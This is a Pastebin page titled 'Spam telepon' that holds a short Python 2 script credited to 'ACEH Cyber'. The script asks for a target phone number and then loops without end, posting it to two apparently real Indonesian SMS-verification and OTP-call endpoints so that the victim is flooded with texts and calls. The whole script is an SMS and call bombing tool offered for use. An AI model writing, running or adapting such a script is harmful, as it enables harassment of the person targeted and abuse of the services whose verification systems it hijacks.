Advertisement
Kang-Tutorial

Spam telepon

Dec 16th, 2018
394
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.81 KB | None | 0 0
  1. import requests
  2. print """
  3. mmmmmmm m      mmmmm          mmmm  mmmmm    mm   m    m
  4.   #    #      #   "#        #"   " #   "#   ##   ##  ##
  5.   #    #      #mmm#"        "#mmm  #mmm#"  #  #  # ## #
  6.   #    #      #                 "# #       #mm#  # "" #
  7.   #    #mmmmm #             "mmm#" #      #    # #    #
  8.  
  9.           By ACEH Cyber <3
  10.                                                    """
  11. k=raw_input("[*] Target: ")
  12. print "[*] Spamming "+k
  13. while True:
  14.     joy=k.replace('+62','0')
  15.     param={'phone':joy,'smsType':'1'}
  16.     requestss=requests.post('http://sc.jd.id/phone/sendPhoneSms', data=param)
  17.     print "[+] "+k+" -> requests spam succces [sms]"
  18.     param2={'msisdn':k,'accept':'call'}
  19.     requests2=requests.post('https://www.tokocash.com/oauth/otp',data=param2)
  20.     print "[+] "+k+" -> requests spam succces [telephone]"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement